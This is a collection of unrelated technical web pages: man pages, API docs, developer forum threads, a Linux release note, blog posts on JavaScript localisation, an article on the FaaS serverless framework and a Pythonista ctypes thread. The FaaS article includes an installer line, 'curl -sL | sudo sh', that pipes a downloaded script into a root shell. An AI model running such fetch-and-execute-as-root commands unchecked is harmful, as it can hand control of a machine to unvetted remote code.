    set(x, (x + 1) * 8, (x + 1) * 26, (x + 1) * 70, 31);
    show();
}

Then add the following line to the onAlexaSpeechFinished function; this turns the lights off after Alexa's response:

clear();

Finally, we need to save the file and recompile with the following commands:

cd Desktop/alexa-avs-sample-app/samples/javaclient
mvn install

In the end, to test, run the AVS web service and the sample app.

Read more detail: Build Your Own Amazon Echo Using a RPi and ReSpeaker HAT
https://projects-raspberry.com/build-your-own-amazon-echo-using-a-rpi-and-respeaker-hat/
brk, sbrk - change data segment size

#include <unistd.h>

int brk(void *end_data_segment);
void *sbrk(ptrdiff_t increment);

brk sets the end of the data segment to the value specified by end_data_segment. end_data_segment must be greater than the end of the text segment and it must be 16 kB before the end of the stack.

sbrk increments the program's data space by increment bytes. sbrk isn't a system call; it is just a C library wrapper.

On success, brk returns zero, and sbrk returns a pointer to the start of the new area. On error, -1 is returned, and errno is set to ENOMEM.

BSD 4.3

brk and sbrk are not defined in the C Standard and are deliberately excluded from the POSIX.1 standard (see paragraphs B.1.1.1.3 and B.8.3.3).

execve(2), getrlimit(2), malloc(3)
http://www.linuxsavvy.com/resources/linux/man/man2/brk.2.html
Creates an array of LDAPMod from a Slapi_Entry.

#include "slapi-plugin.h"
int slapi_entry2mods(const Slapi_Entry *e, char **dn, LDAPMod ***attrs);

This function takes the following parameters:

e - Pointer to a Slapi_Entry.
dn - Address of a char* that will be set on return to the entry DN.
attrs - Address of an array of LDAPMod that will be set on return to a copy of the entry attributes.

This function returns one of the following values:

0 if successful.
non-0 if not successful.

This function creates an array of LDAPMod of type LDAP_MOD_ADD from a Slapi_Entry. Such structures may be useful, for example, when performing LDAP add and modify operations as a client from inside a plug-in.
https://docs.oracle.com/cd/E19424-01/820-4810/aaifo/index.html
Re: getting rid of NS0 (name space) in xml tags
- From: "Leo Gan" <leo_gan_57@xxxxxxxxxxx>
- Date: Thu, 13 Jul 2006 09:16:56 -0700

Hi,
Does your partner use a self-made XML parser? As far as I know, U can ignore the prefixes if U don't want to use the namespaces (it's quite strange, 'cause the namespaces are one of the main parts of XML) and if U use the MS XML parsers. It's the parser's job to bother with namespaces and prefixes. BTW, BizTalk doesn't work well with XML messages without namespaces.
I agree that the SQL adapter is sort of hard to understand. Could U, please, give more information about:
"I am using a sql adapter with an xml document schema and envelope schema..."
--
Regards
Leonid Ganeline
BizTalk Solution Developer
===========================
================================
"new_world_order_piggies" <newworldorderpiggies@xxxxxxxxxxxxxxxxxxxxxxxxx> wrote in message news:040A7286-EC0D-4193-9052-9FDB5694B587@xxxxxxxxxxxxxxxx
I am using a sql adapter with an xml document schema and envelope schema. My understanding is that I need to use the same name space to put this into effect for the 2 schemas and allow BizTalk to bring back multiple rows from SQL Server. Is this correct? The bottom line is that I need to remove the NS0: prepended to the output tags or our trading partner can't consume our xml. Is there any way to get rid of these prepended values?
As a general comment, if this is being monitored, I am surprised at the complexity and difficulty in using the sql adapter for BizTalk, especially in terms of bringing back and interpreting multiple rows. I would've thought this would be much easier, and further, the fact that the schema tags are changed is outrageous. I'm sure someone can explain it and I'm also sure there are "good" reasons for it happening, but really, to change the schema such that it no longer becomes portable destroys the entire idea of XML being the self-describing, all-purpose data format it is supposed to be.
In short, if there is a way to remove the cursed NS0 I'd love to hear about it.
--
Thanks to any and all,
NWOP.
http://www.tech-archive.net/Archive/BizTalk/microsoft.public.biztalk.general/2006-07/msg00209.html
Adding a shelf button to launch Toolkit apps in Maya is pretty straightforward. Here is an example of how to add a custom shelf button that opens the Loader app. (Note that this assumes Toolkit is currently enabled in your Maya session; this does not bootstrap Toolkit.)

Open your Script Editor in Maya and paste in the following Python code:

import maya.cmds as cmds

# The internal Toolkit app name
tk_app = "tk-multi-loader2"

# The public function that opens the app dialog. This function is located in the app's
# app.py file in the top directory (eg. install/apps/app_store/tk-multi-loader2/app.py).
# The name of this function varies from app to app, but is generally easy to determine by
# looking at the code.
call_func = "open_publish"

try:
    import sgtk

    # get the current engine (e.g. tk-maya)
    current_engine = sgtk.platform.current_engine()
    if not current_engine:
        cmds.error("Shotgun integration is not available!")

    # find the current instance of the app:
    app = current_engine.apps.get(tk_app)
    if not app:
        cmds.error("The Toolkit app '%s' is not available!" % tk_app)

    # call the public method on the app to show the dialog:
    app_open_func = getattr(app, call_func)
    app_open_func()
except Exception, e:
    msg = "Unable to launch Toolkit app '%s': %s" % (tk_app, e)
    cmds.confirmDialog(title="Toolkit Error", icon="critical", message=msg)
    cmds.error(msg)

Select this code and drag it on to your custom shelf. See the Maya docs for more info on how to work with custom shelf buttons.

You should be able to use this code example to launch any Toolkit apps that are enabled in Maya by modifying the tk_app and call_func variables at the top.
https://support.shotgunsoftware.com/hc/en-us/articles/219040618-How-do-I-add-a-shelf-button-to-launch-a-Toolkit-app-in-Maya-
We've had the regular two-week (and one day) merge window, and -rc1 is out, and the merge window is closed.

[ I suspect I'll still merge the SCore architecture, I wanted to give it a quick peek, but I've been busy with all the other patches so I'm closing the merge window now, but leaving myself the option of merging Score later - last I looked, the only non-SCore file it touched was the MAINTAINERS file, so it's not like it should break anything else ]

There's a lot in there, but let me say that as far as the whole merge window has gone, I've seldom felt happier merging stuff from people. I'm really hoping it isn't just a fluke, but people kept their git trees clean, and while there were a couple of times that I said "no, I'm not going to merge that", on the whole this was a really painless merge window for me.

I'm not saying that it was necessarily less bug-free than usual, I'm just saying that on the whole people sent me merge requests that made sense, explained what they did, and when I pulled I saw clear development lines. That just makes it much easier for me. So thanks to everybody involved. I hope that doesn't mean that it was really painful for others, or that we'll be chasing down more bugs than usual. And I _really_ hope we can keep things going this way, and it wasn't a one-off "things just happened to work this time".

As to the actual changes - too many to list. As usual, the bulk of the changes are to drivers (70% of the diffs), with drivers/staging being the bulk of that (about 60% of all driver changes - 40% of the total). But wonder of wonder, I think drivers/staging actually _shrank_ this time around, allegedly due to cleanups. Believe that who will.

On the filesystem front, we had btrfs, ext3 and xfs getting active development (Why xfs? Beats me, but that's what the stats say), and a fair chunk of work on the whole fsnotify unification work. And the VFS layer got some TLC wrt ACL and private namespace handling.
On architectures: ARM, powerpc, mips, sh, x86 are the bulk of it. On ARM, the bulk is new platforms (u300, freescale stmp, whatever), there seems to be no end to crazy new arm platforms. On x86 (and at least some degree on powerpc), a noticeable part is the whole new perf-counter subsystem. Along with lots and lots of other stuff. On the whole? Tons of stuff. Let's start testing and stabilizing. Linus
http://www.linux.com/news/software/linux-kernel/23008-linux-2631-rc1-released
Wednesday, 30 May 2012

Dad Didn't Buy Any Games

I grew up in the '80s just outside London. For those of you of a different vintage let me paint a picture. These were the days when "Personal Computers", as they were then styled, were taking the world by storm. Every house would be equipped with either a ZX Spectrum, a Commodore 64 or an Amstrad CPC. These were 8-bit computers which were generally plugged into the family television and spent a good portion of their time loading games like Target: Renegade from an audio cassette.

But not in our house; we didn't have a computer. I remember mournfully pedalling home from friends' houses on a number of occasions, glum as I compared my lot with theirs. Whereas my friends would be spending their evenings gleefully battering their keyboards as they thrashed the life out of various end-of-level bosses, I was reduced to *wasting* my time reading. That's right Enid Blyton - you were second best in my head.

Then one happy day (and it may have been a Christmas present although I'm not certain) our family became the proud possessors of an Amstrad CPC 6128:

But I was wrong. I had reckoned without my father. For reasons that I've never really got to the bottom of, Dad had invested in the computer but not in the games. Whilst I was firmly of the opinion that these two went together like Lennon and McCartney, he was having none of it. "You can write your own son" he intoned and handed over a manual which contained listings for games:

And that's where it first began really. I would spend my evenings typing the Locomotive Basic listings for computer games into the family computer. Each time I started I would be filled with great hopes for what might result. Each time I tended to be rewarded with something that looked a bit like this:

I'm not sure that it's possible to learn to program by osmosis but if it is I'm definitely a viable test case. I didn't become an expert Locomotive Basic programmer (was there ever such a thing?)
but I did undoubtedly begin my understanding of software.... Thanks Dad!

Monday, 7 May 2012

Globalize.js: number and date localisation made easy

I wanted to write about a JavaScript library which seems to have had very little attention so far. And that surprises me as it's:
- Brilliant!
- Solves a common problem that faces many app developers who work in the wonderful world of web; myself included

The library is called Globalize.js and can be found on GitHub here. Globalize.js is a simple JavaScript library that allows you to format and parse numbers and dates in a culture-specific fashion.

Why does this matter? Because different countries and cultures do dates and numbers in different ways. Christmas Day this year in England will be 25/12/2012 (dd/MM/yyyy). But for American eyes this should be 12/25/2012 (M/d/yyyy). And for German, 25.12.2012 (dd.MM.yyyy). Likewise, if I was to express numerically the value of "one thousand exactly - to 2 decimal places", as a UK citizen I would do it like so: 1,000.00. But if I was French I'd express it like this: 1.000,00. You see my point?

Why does this matter to me? For a number of years I've been working on applications that are used globally, from London to Frankfurt to Shanghai to New York to Singapore and many other locations besides. The requirement has always been to serve up localised dates and numbers so users' experience of the system is more natural. Since our applications are all ASP.NET we've never really had a problem server-side. Microsoft have blessed us with all the goodness of System.Globalization which covers hundreds of different cultures and localisations. It makes it frankly easy:

using System.Globalization;

// Produces: "06.05.2012"
new DateTime(2012, 5, 6).ToString("d", new CultureInfo("de-DE"));

// Produces: "45,56"
45.56M.ToString("n", new CultureInfo("fr-FR"));

The problem has always been client-side. If you need to localise dates and numbers on the client what do you do?
JavaScript Date / Number Localisation - the Status Quo

Well to be frank - it's a bit rubbish really. What's on offer natively at present basically amounts to the built-in toLocale* methods on Date and Number. This is better than nothing - but not by much. There's no real control or flexibility here. If you don't like the native localisation format or you want something slightly different then tough. This is all you've got to play with.

For the longest time this didn't matter too much. Up until relatively recently the world of web was far more about the thin client and the fat server. It would be quite standard to have all HTML generated on the server. And, as we've seen, .NET (and many other back-end environments as well) give you all the flexibility you might desire given this approach. But the times they are a-changing. And given the ongoing explosion of HTML 5 the rich client is very definitely with us. So we need tools.

Microsoft doing *good things*

Hands up who remembers when Microsoft first shipped its ASP.NET AJAX library back in 2007? Well a small part of this was the extensions ASP.NET AJAX added to JavaScript's native Date and Number objects.... These extensions allowed the localisation of Dates and Numbers to the current UI culture and the subsequent string parsing of these back into Dates / Numbers. These extensions pretty much gave JavaScript the functionality that the server already had in System.Globalization (not quite like-for-like but near enough the mark).

I'm not aware of a great fuss ever being made about this - a fact I find surprising since one would imagine this is a common need. There's good documentation about this on MSDN - here are some useful links:
- Ajax Script Globalization and Localization
- Walkthrough: Globalizing a Date by Using Client Script
- JavaScript Base Type Extensions
- Date.parseLocale
- Date.localeFormat
- Number.localeFormat
- Number.parseLocale

When our team became aware of this we started to make use of it in our web applications. I imagine we weren't alone...
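For reference, the native "status quo" methods discussed in the section above look like this — a minimal sketch (the exact output strings depend entirely on the runtime's locale, which is precisely the problem):

```javascript
var when = new Date(2012, 4, 6); // 6 May 2012 (months are zero-based)

// Native localisation: you get whatever format the host environment
// decides, with no pattern control and no way to pick a different culture.
var localDate = when.toLocaleDateString();
var localNumber = (1000.5).toLocaleString();

console.log(localDate);   // e.g. "06/05/2012" on a UK machine
console.log(localNumber); // e.g. "1,000.5" on a UK machine
```

Contrast that take-it-or-leave-it behaviour with the pattern-based formatting shown later.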
Microsoft doing *even better things* (Scott Gu to the rescue!)

I started to think about this again when MVC reared its lovely head. Like many, I found I preferred the separation of concerns / testability etc. that MVC allowed. As such, our team was planning to, over time, migrate our ASP.NET WebForms applications over to MVC. However, before we could even begin to do this we had a problem. Our JavaScript localisation was dependent on the ScriptManager. The ScriptManager is very much a WebForms construct. What to do?

To the users it wouldn't be acceptable to remove the localisation functionality from the web apps. The architecture of an application is, to a certain extent, meaningless from the users' perspective - they're only interested in what directly impacts them. That makes sense, even if it was a problem for us.

Fortunately the Great Gu had it in hand. Lo and behold, this post appeared on the jQuery forum and the following post appeared on Guthrie's blog:

Yes that's right. Microsoft were giving back to the jQuery community by contributing a jQuery globalisation plug-in. They'd basically taken the work done with the ASP.NET AJAX Date / Number extensions, jQuery-plug-in-ified it and put it out there. Fantastic!

Using this we could localise / globalise dates and numbers whether we were working in WebForms or in MVC. Or anything else for that matter. If we were suddenly seized with a desire to re-write our apps in PHP we'd *still* be able to use Globalize.js on the client to handle our regionalisation of dates and numbers.

History takes a funny course...

Now for my part I would have expected this announcement to be followed in short order by dancing in the streets and widespread adoption. Surprisingly, not so. All went quiet on the globalisation front for some time and then out of the blue the following comment appeared on the jQuery forum by Richard D.
Worth (he of jQuery UI fame):

The long and short of which was:
- The jQuery UI team were now taking care of the (re-named) Globalize.js library, as the grid control they were developing had a need for some of Globalize.js's goodness. Consequently a home for Globalize.js appeared on the jQuery UI website:
- The source of Globalize.js moved to this location on GitHub:
- Perhaps most significantly, the jQuery globalisation plug-in as developed by Microsoft had now been made a standalone JavaScript library. This was clearly brilliant news for Node.js developers as they would now be able to take advantage of this and perform localisation / globalisation server-side - they wouldn't need to have jQuery along for the ride. Also, this would presumably be good news for users of other client-side JavaScript libraries like Dojo / YUI etc.

Globalize.js clearly has a rosy future in front of it. Using the new Globalize.js library was still simplicity itself. Here are some examples of localising dates / numbers using the German culture:

<script src="/Scripts/Globalize/globalize.js" type="text/javascript"></script>
<script src="/Scripts/Globalize/cultures/globalize.culture.de-DE.js" type="text/javascript"></script>

Globalize.culture("de-DE");

// "2012-05-06" - ISO 8601 format
Globalize.format(new Date(2012, 4, 6), "yyyy-MM-dd");

// "06.05.2012" - standard German short date format of dd.MM.yyyy
Globalize.format(new Date(2012, 4, 6), Globalize.culture().calendar.patterns.d);

// "4.576,3" - a number rendered to 1 decimal place
Globalize.format(4576.34, "n1");

Stick a fork in it - it's done

The entry for Globalize.js on the jQuery UI site reads as follows:

"version: 0.1.0a1 (not a jQuery UI version number, as this is a standalone utility)
status: in development (part of Grid project)"

I held back from making use of the library for some time, deterred by the "in development" status.
However, I had a bit of dialog with one of the jQuery UI team (I forget exactly who) who advised that the API was unlikely to change further and that the codebase was actually pretty stable. Our team did some testing of Globalize.js and found this very much to be the case. Everything worked just as we expected and hoped. We're now using Globalize.js in a production environment with no problems reported; it's been doing a grand job. In my opinion, Number / Date localisation on the client is ready for primetime right now - it works!

Unfortunately, because Globalize.js has been officially linked in with the jQuery UI grid project, it seems unlikely that this will officially ship until the grid does. Looking at the jQuery UI roadmap, the grid is currently slated to release with jQuery UI 2.1. There isn't yet a release date for jQuery UI 1.9 and so it could be a long time before the grid actually sees the light of day. I'm hoping that the jQuery UI team will be persuaded to "officially" release Globalize.js long before the grid actually ships. Obviously people can use Globalize.js as is right now (as we are) but it seems a shame that many others will be missing out on using this excellent functionality, deterred by the "in development" status. Either way, the campaign to release Globalize.js officially starts here!

The Future?

There are plans to bake globalisation right into JavaScript natively with EcmaScript 5.1. There's a good post on the topic here. And here are a couple of historical links worth reading too:
https://blog.johnnyreilly.com/2012/05/
Introducing Functions as a Service (FaaS)

There's no reason cloud providers should have a monopoly on serverless computing. Check out this open source framework that helps you use FaaS.

Functions as a Service (FaaS) is a framework for building serverless functions on top of containers. I began this project as a proof of concept in October last year when I wanted to understand if I could run Alexa skills or Lambda functions on Docker Swarm. After some initial success, I released the first version of the code in Golang on GitHub in December.

This post gives a straightforward introduction to serverless computing, then covers my top 3 features introduced in FaaS over the last 500 commits, and finishes with what's coming next and how to get involved.

From that first commit, FaaS went on to gain momentum and over 2,500 stars on GitHub along with a small community of developers and hackers, who have been giving talks at meetups, writing their own cool functions, and contributing code. The highlight for me was winning a place in Moby's Cool Hacks keynote session at Dockercon in Austin in April. The remit for entries was to push the boundaries of what Docker was designed to do.

What Is Serverless?

Architecture Is Evolving

"Serverless" is a misnomer — we're talking about a new architectural pattern for event-driven systems. For this reason, serverless functions are often used as connective glue between other services or in an event-driven architecture. In the days of old, we called this a service bus.
Serverless is an evolution

Serverless Functions

A serverless function is a small, discrete, and reusable chunk of code that:
- Is short-lived
- Is not a daemon (long-running)
- Does not publish TCP services
- Is not stateful
- Makes use of your existing services or third-party resources
- Executes in a few seconds (based on AWS Lambda's default)

We also need to make a distinction between serverless products from IaaS providers and open source software projects. On one hand, we have serverless products from IaaS providers such as Lambda, Google Cloud Functions, and Azure Functions. On the other hand, we have frameworks such as FaaS, which let an orchestration platform such as Docker Swarm or Kubernetes do the heavy lifting.

Cloud Native — bring your favorite cluster.

A serverless product from an IaaS vendor is completely managed, so it offers a high degree of convenience and per-second/minute billing. On the flip side, you are also very much tied into the vendor's release and support cycle. Open-source FaaS exists to promote diversity and offer choice.

What's the Difference With FaaS?

FaaS builds upon industry-standard Cloud Native technology: The FaaS stack

The difference with the FaaS project is that any process can become a serverless function through the watchdog component and a Docker container. That means three things:
- You can run code in whatever language you want
- For however long you need
- Wherever you want to

Going serverless shouldn't have to mean re-writing your code in another programming language. Just carry on using whatever your business and team needs.

For example, cat or sha512sum can be a function without any changes, since functions communicate through stdin/stdout. Windows functions are also supported through Docker CE. This is the primary difference between FaaS and the other open-source serverless frameworks, which depend on bespoke runtimes for each supported language.
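The stdin/stdout contract described above is easy to try from any shell, no FaaS deployment required — a quick sketch:

```shell
# The watchdog forks one process per request: the HTTP body goes in on
# stdin, and whatever the process writes to stdout becomes the response.
# sha512sum already speaks that protocol, so it is a valid "function":
echo -n "hello" | sha512sum | cut -d' ' -f1
```

Packaged in a container image alongside the watchdog, that same pipeline becomes an HTTP endpoint.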
Let's look at three of the big features that have come along since Dockercon, including CLI and function templating, Kubernetes support, and asynchronous processing.

1. The New CLI

Easy Deployments

I added a CLI to the FaaS project for making deploying functions easier and scriptable. Prior to this, you could use the API Gateway's UI or curl. The CLI allows functions to be defined in a YAML file and then be deployed to the API Gateway. Finnian Anderson wrote a great intro to the FaaS CLI on Practical Dev/dev.to.

Utility Script and Brew

There is an installation script available, and John McCabe helped the project get a recipe on brew.

$ brew install faas-cli

or

$ curl -sL | sudo sh

Templating

Templating in the CLI is where you only need to write a handler in your chosen programming language and the CLI will use a template to bundle it into a Docker container — with the FaaS magic handled for you. There are two templates provided for Python and Node.js, but you can create your own easily.

There are three actions the CLI supports:
- -action build: creates Docker images locally from your templates
- -action push: pushes your templates to your desired registry or the Hub
- -action deploy: deploys your FaaS functions

If you have a single-node cluster, you don't need to push your images to deploy them. Here's an example of the CLI configuration file in YAML:

provider:
  name: faas
  gateway:

functions:
  url_ping:
    lang: python
    handler: ./sample/url_ping
    image: alexellis2/faas-urlping

sample.yml

Here is the bare minimum handler for a Python function:

def handle(req):
    print(req)

This is an example that pings a URL over HTTP for its status code:

import requests

def print_url(url):
    try:
        r = requests.get(url, timeout=1)
        print(url + " => " + str(r.status_code))
    except:
        print("Timed out trying to reach URL.")

def handle(req):
    print_url(req)

./sample/url_ping/handler.py

If you need additional pip modules, then also place a requirements.txt file alongside your handler.py file.
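Because a template handler is plain Python, you can exercise it locally before faas-cli builds anything. A hedged sketch — the invoke helper below is mine, not part of the template; it just mimics the watchdog's stdin/stdout round trip:

```python
import io
import sys


def handle(req):
    # Same shape as the template's handler: write the response to stdout.
    print("Hello, " + req)


def invoke(req):
    """Mimic the watchdog: call the handler and capture its stdout."""
    buf = io.StringIO()
    old_stdout = sys.stdout
    sys.stdout = buf
    try:
        handle(req)
    finally:
        sys.stdout = old_stdout
    return buf.getvalue().strip()


if __name__ == "__main__":
    print(invoke("FaaS"))  # -> Hello, FaaS
```

A plain assert on invoke() in a unit test gives you a fast feedback loop; the Docker build and deploy only need to happen once the handler behaves.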
$ faas-cli -action build -f ./sample.yml

You'll then find a Docker image called alexellis2/faas-urlping, which you can push to DockerHub with -action push and deploy with -action deploy. You can find the CLI in its own repo.

2. Kubernetes Support

As a Docker Captain, I focus primarily on learning and writing about Docker Swarm, but I have always been curious about Kubernetes. I started learning how to set Kubernetes up on Linux and Mac and wrote three tutorials on it, which were well-received in the community.

Architecting Kubernetes Support

Once I had a good understanding of how to map Docker Swarm concepts over to Kubernetes, I wrote a technical prototype and managed to port all the code over in a few days. I opted to create a new microservice daemon to speak to Kubernetes rather than introducing additional dependencies to the main FaaS codebase. FaaS proxies the calls to the new daemon via a standard RESTful interface for operations such as Deploy, List, Delete, Invoke, and Scale. Using this approach meant that the UI, the CLI, and auto-scaling all worked out of the box without changes.

The resulting microservice is being maintained in a new GitHub repository called FaaS-netes and is available on DockerHub. You can set it up on your cluster in around 60 seconds.

Watch a Demo of Kubernetes Support

In this demo, I deploy FaaS to an empty cluster, then run through how to use the UI and Prometheus, and trigger auto-scaling too.

But Wait... Aren't There Other Frameworks That Work on Kubernetes?

There are probably two categories of serverless frameworks for Kubernetes — those which rely on a highly specific runtime for each supported programming language, and ones like FaaS, which let any container become a function. FaaS has bindings to the native API of Docker Swarm and Kubernetes, meaning it uses first-class objects that you are already used to managing, such as Deployments and Services.
This means there is less magic and less code to decipher when you get into the nitty-gritty of writing your new applications. A consideration when picking a framework is whether you want to contribute features or fixes. OpenWhisk, for instance, is written in Scala. Most of the others are written in Golang.

3. Asynchronous Processing

One of the traits of a serverless function is that it's small and fast, typically completing synchronously within a few seconds. There are several reasons why you may want to process your function asynchronously:

- It's an event and the caller doesn't need a result.
- It takes a long time to execute or initialize, i.e. TensorFlow/machine learning.
- You're ingesting a large number of requests as a batch job.
- You want to apply rate limiting.

I started a prototype for asynchronous processing via a distributed queue. The implementation uses the NATS Streaming project but could be extended to use Kafka or any other abstraction that looks like a queue. I have a Gist available for trying the asynchronous code out:

What's Next?

Thanks to the folks at Packet.net, a new logo and website will be going live soon. Packet are automating the Internet and offer great-value bare-metal infrastructure in the cloud.

Speaking

I'll be speaking on serverless and FaaS at LinuxCon North America in September. Come and meet me there, and if you can't make it, follow me on Twitter @alexellisuk.

Please show support for FaaS: star the GitHub repository and share this blog post on Twitter. You can get started with the TestDrive over on GitHub:

I'm most excited about the growing Kubernetes support and asynchronous processing. It would also be great to have someone take a look at running FaaS on top of Azure Container Instances.
All Contributions Are Welcome

Whether you want to help with issues, coding features, releasing the project, scripting, tests, benchmarking, documentation, updating samples, or even blogging about it, there is something for everyone, and it all helps keep the project moving forward. So if you have feedback, ideas, or suggestions, please post them to me @alexellisuk or via one of the GitHub repositories.

Not sure where to start? Get inspired by the community talks and sample functions, including machine learning with TensorFlow, ASCII art, and easy integrations.

Published at DZone with permission of Alex Ellis. See the original article here. Opinions expressed by DZone contributors are their own.
Konstantin Scheglov

Sorry, you are correct. You are missing the center region completely, which is required to position it at the south. The layout method is not doing anything without a center widget defined.

Code:
```java
public class ImageViewer implements EntryPoint {
  public void onModuleLoad() {
    RootPanel rootPanel = RootPanel.get();
    {
      NorthSouthContainer container = new NorthSouthContainer();
      container.setBorders(true);
      rootPanel.add(container, 10, 10);
      container.setWidget(new HTML());
      container.setSize("250px", "200px");
      // "south" rendered on "north", not stretched horizontally
      container.setSouthWidget(new Button("SSSSSSSSSSSS"));
    }
  }
}
```

1. Why do I do this? Because I can. GXT 3 is about making things easier and safer, right? :-)
2. I've tried to add the container after setting the south widget. No difference.

Screenshot_20120206_155833.jpg

Reply to Konstantin Scheglov:

You should not write your code in a way that forces two layout chains, as this will always end up being slow. Before adding something to the RootPanel, first build it completely. The good thing is that GXT already caches multiple layout chains.

However, a NorthSouthContainer always requires the center region; please see the edited post. I updated the code to update at least the width if no center region is specified; this change is in SVN now. However, the south part will always be displayed under the center region. If there is none, then it's under the north region. If that is also missing, then it's the top part.

Konstantin Scheglov

OK, thank you for help and fixes.

Reply:

The change will be in the next beta release.
Adds a target field to EventBase so listeners can resolve source ID conflicts between different behaviors. More...

#include <TimerEvent.h>

Adds a target field to EventBase so listeners can resolve source ID conflicts between different behaviors. See EventRouter's class documentation for discussion of how to request and use timers.

Definition at line 12 of file TimerEvent.h. List of all members.

getBinSize: should return the minimum size needed if using binary format (i.e. not XML). Definition at line 25 of file TimerEvent.cc.

getDescription: generates a description of the event with variable verbosity. Definition at line 11 of file TimerEvent.cc.

getTarget: returns target. Definition at line 27 of file TimerEvent.h.

loadBinaryBuffer: load from binary format. Definition at line 36 of file TimerEvent.cc.

loadXML: load from XML format. Definition at line 55 of file TimerEvent.cc.

operator=: assignment operator, does a shallow copy (copies pointer value, doesn't try to clone target!). Definition at line 21 of file TimerEvent.h.

saveBinaryBuffer: save to binary format. Definition at line 47 of file TimerEvent.cc.

saveXML: save to XML format. Definition at line 81 of file TimerEvent.cc.

setTarget: assigns tgt to target. Definition at line 28 of file TimerEvent.h.

[static, protected] causes class type id to automatically be registered with EventBase's FamilyFactory (getTypeRegistry()). Definition at line 42 of file TimerEvent.h. Referenced by getClassTypeID().

[protected] target: indicates the listener for which the timer was created. Definition at line 39 of file TimerEvent.h. Referenced by getBinSize(), getDescription(), getTarget(), loadBinaryBuffer(), loadXML(), operator=(), saveBinaryBuffer(), saveXML(), and setTarget().
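As a rough illustration of why the target field matters (this is hypothetical, self-contained code, not the actual Tekkotsu classes): two behaviors may request timers that end up with the same source ID, and the target pointer is what lets a listener keep only its own timers.

```cpp
#include <cassert>

// Self-contained sketch (not real Tekkotsu code) of the pattern the
// target field enables: a listener ignores timers meant for others.
struct Listener {};

struct TimerEventSketch {
    unsigned int sourceID;     // may collide between behaviors
    const Listener* target;    // which listener requested this timer
};

// A listener filters incoming timer events by comparing the event's
// target against itself, resolving source ID conflicts.
bool isMine(const TimerEventSketch& ev, const Listener* self) {
    return ev.target == self;
}
```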
GKPath question - smartvipere75

I have a float2 struct that works perfectly:

```python
class float2(Structure):
    _fields_ = [('x', c_float), ('y', c_float)]
```

How can I implement this method of GKPath?

- (instancetype)initWithPoints:(vector_float2 *)points count:(size_t)count radius:(float)radius cyclical:(BOOL)cyclical

Specifically, the problem is that when I pass an array of float2 to the points parameter, the app crashes.

Reference: GKPath initWithPoints:count:radius:cyclical:

Can you post the code that is creating the array and calling the method?

This worked for me:

```python
from objc_util import *
from ctypes import *
from scene import *

load_framework('Foundation')
load_framework('GameplayKit')
GKPath = ObjCClass('GKPath')

class float2(Structure):
    _fields_ = [('x', c_float), ('y', c_float)]
    def __repr__(self):
        return 'float2({},{})'.format(self.x, self.y)

pts = (float2*5)()  # array of 5 points
pts[0] = float2(10, 11)
pts[1] = float2(20, 21)
pts[2] = float2(30, 31)
pts[3] = float2(40, 41)
pts[4] = float2(50, 51)

# for some reason, count needs to be count+1?
path = GKPath.pathWithPoints_count_radius_cyclical_(
    pts, len(pts)+1, 0.5, 0,
    argtypes=[c_void_p, c_size_t, c_float, c_bool],
    restype=c_void_p)

# On my 32-bit iPad I have had trouble with the right way to read back
# a float2. The following gets x:
#   ptx = path.pointAtIndex_(1, argtypes=[c_ulong], restype=c_float)
# This just crashes:
#   ptx = path.pointAtIndex_(1, argtypes=[c_ulong], restype=float2)
# maybe because objc_util is not using objc_msgSend_stret for custom
# restype? So the restype=float2 form might work on 64-bit.

# This works in 32-bit, but probably does not work on 64-bit machines:
for i in range(5):
    p = c_uint64(path.pointAtIndex_(i, argtypes=[c_ulong], restype=c_uint64))
    pt = float2.from_address(addressof(p))
    print(pt)
```

objc_util seems to have trouble with both of these methods, figuring out argtypes.

@JonB Try adding an extra underscore at the end of the methods that take/return vector_float2s, and then use the float2 struct. Last time that worked, I think.

Nope, selector not found.

I have not looked at the code, but I think this is just a problem with objc_util. There is special code for handling structure returns on 32-bit; my guess is that it uses the inferred restype, not the user-passed one, to make that decision.

The encodings seem to be screwed up on some of these:

```python
>>> path.pointAtIndex_.encoding
b'12@0:4I8'
```

It seems to be missing the return type character!

A separate issue:

```python
>>> GKPath.pathWithPoints_count_radius_cyclical_.encoding
b'@24@0:4^8L12f16c20'
```

objc_util barfs on the ^8 when parsing argtypes (ignores it completely).

Yeah, the part of Clang that generates encodings simply does not do vector types. When it sees one, it encodes it as an empty string, which makes it basically impossible to parse the encoding. I don't think this is something objc_util can support (and since method calls involving vectors require some manual work anyway, I don't think that's really an issue).

Now that I think about it, it makes sense that the pathWithPoints... method doesn't have an "underscore" version. The vectors are only passed indirectly through a pointer, and not directly as a normal parameter. For direct vector parameters, the compiler seems to generate two methods: the regular one, which probably uses fancy vector registers, and the "underscored" one, which uses regular structs. For indirect parameters this isn't necessary; the vectors are passed by pointer, so they have to be in memory, and it's not possible to use vector registers for passing anyway.

Can you check if there is a pointWithIndex__ method with two underscores, and try to use that with a float2 struct restype?

```python
>>> split_encoding('@24@0:4^8L12f16c20')
['@', '@', ':', '^L', 'f', 'c']
```

Knowing that Clang doesn't properly represent vectors in the encoding, it seems like we could split on numbers appearing where they are not supposed to... so ^8L should not be interpreted as ^L (pointer to unsigned long), but as a pointer to something we are not sure of (c_void_p) followed by a long.

A vector restype is obviously a little trickier, especially since the size info never seems correct.

I am on iOS 9, but there are no double-underscore pointWithIndex or pointAtIndex. I think on 10 maybe it was replaced with float2AtIndex.
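For anyone following along without an iOS device, the float2 array-of-structs pattern from the thread can be exercised in plain desktop Python; the address arithmetic below mirrors the from_address workaround discussed above:

```python
# Self-contained ctypes illustration (no iOS or objc_util required) of
# the float2 struct and array-of-struct pattern used in the thread.
from ctypes import Structure, c_float, sizeof, addressof

class float2(Structure):
    _fields_ = [('x', c_float), ('y', c_float)]

# Build a contiguous array of three float2 values, the same shape of
# buffer that gets handed to GKPath's points parameter.
pts = (float2 * 3)()
for i, (x, y) in enumerate([(10, 11), (20, 21), (30, 31)]):
    pts[i] = float2(x, y)

# Read element 1 back out by raw address, mirroring the
# float2.from_address trick used as the 32-bit workaround.
pt = float2.from_address(addressof(pts) + 1 * sizeof(float2))
```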
How to customize Fomantic UI with LESS and Webpack? (applicable to Semantic UI too)

Introduction

Ever heard about Fomantic UI? It is likely that you did not. It is a community fork of the great UI library called Semantic UI, which has unfortunately become a bit abandoned, so some great folks made a fork and are moving forward with work which is not limited to fixing bugs! Their intention is to merge back into the main repo as soon (and obviously if) as development starts again.

Many people coming across FUI/SUI (I will be using these abbreviations in this article to not repeat myself with the whole names every time; they obviously mean Fomantic UI/Semantic UI) quickly face issues with any customization, and this is exactly what happened to me.

My setup

